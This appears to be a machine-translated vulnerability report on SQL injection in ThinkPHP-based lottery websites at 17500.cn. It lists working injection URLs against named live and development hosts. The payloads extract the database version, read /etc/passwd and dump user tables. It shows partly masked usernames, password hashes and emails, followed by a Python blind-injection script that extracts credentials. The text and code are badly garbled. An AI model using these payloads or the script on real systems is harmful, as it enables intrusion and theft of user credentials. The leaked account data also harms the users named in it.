Happy web SQL Injection Vulnerability
Happy web SQL Injection Vulnerability
Many websites of Happy color network adopt thinkphp framework for development. Because patches are not updated in time, there is a general injection. See 2cto: SQL Injection. injection 1 in the ThinkPHP framework architecture:
Http://lebi.17500.cn/Experts/Search/index/lotid/3d.html? Ename [0] = exp & ename [1] = and (select (0) from (select/**/sleep (1) v)
Corresponding development and test sites:
Http://devlebi.17500.cn/Experts/Search/index/lotid/3d.html? Ename [0] = exp & ename [1] = and % 20 updatexml (1, concat (0x7c, user (), 0x7c, version (), 1)
Load_file:
Http://devlebi.17500.cn/Experts/Search/index/lotid/3d.html? Ename [0] = exp & ename [1] = and % 20 updatexml (1, concat (0x7c, load_file (% 27/etc/passwd % 27), 1)
Injection 2: passport site
Https://passport.17500.cn/message/system/sitefrom/1.html? Isread [0] = exp & isread [1] = and % 200% 20or % 201% 20 limit % 2023% 23
Https://passport.17500.cn/message/system.html? Msgid = 56
There are many more...
120 million user data:
Select (count (*) from uc. uc_memory: 1229581
Select (group_concat (uid, 0x3a, username, 0x3a, password, 0x3a, email, 0x7c) from uc. uc_members where uid in (2, 4 ):
Eren: d6694 ************** 39c9f06742cc8: doubutou@17500.cn: 134424
Pawn: e1cac8ddd3 *************** 33aa15f: dao@17500.cn: 907316
Test Script: (replace the cookie in the script)
# Coding = UTF-8 ''' databases: information_schema, bbslog, cnlot2004, lottery, mysql, newlebi, cece_schema, test, uc, ucbak, uprofile ''' import sys, url2libimport threadingfrom multiprocessing. dummy import Poolfrom multiprocessing. dummy import Lockfrom optparse import OptionParserfrom urllib2 import Request, urlopen, URLError, HTTPErrorimport urllibdef request (URL): user_agent = {'user-agent': 'mozilla/5.0 (Macintosh; intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10 '} req = urllib2.Request (URL, None, user_agent) req. add_header ('cookie ', 'phpsessid = 7dsnoj0rejlv4m9dg90ures6j1') # Cookie try: request = urllib2.urlopen (req) Login T Exception: return ''return request. read () def binary_sqli (left, right, index): global result while 1: mid = (left + right)/2 if mid = left: lock. acquire () result [index-1] = chr (mid) sys. stdout. write ('\ r % s' % 'data:' + ''. join (result ). strip ('*') sys. stdout. flush () lock. release () break payload = "(ascii (substring (select (group_concat (uid, 0x3a, username, 0x3a, password, 0x3a, email, 0x7c) from uc. uc_members where uid in (2, 4), % s, 1) % s = ascii (substring (select (group_concat (uid, 0x3a, username, 0x3a, password, 0x3a, email, 0x7c) from uc. uc_members where uid in (2, 4), % s, 1) limit 2 # "% (index, mid, index) html = request (' https://passport.17500.cn/message/system/sitefrom/1.html?isread [0] = exp & isread [1] =-1 + or '+ urllib. quote (payload) verify = '2017-03-17 01:57:21 'if verify in html: right = mid else: left = middef multi_run_wrapper (args): return binary_sqli (* args) if _ name _ = '_ main _': result = list ('* 100) lock = Lock () args = [] for I in range (0, 1,100): args. append (32,127, I) pool = Pool (10) out = pool. map (multi_run_wrapper, args) pool. close () pool. join () output = open('result.txt ', 'w') output. write (''. join (result) output. close ()
Solution: Upgrade thinkphp to WAF, which is a reliable one.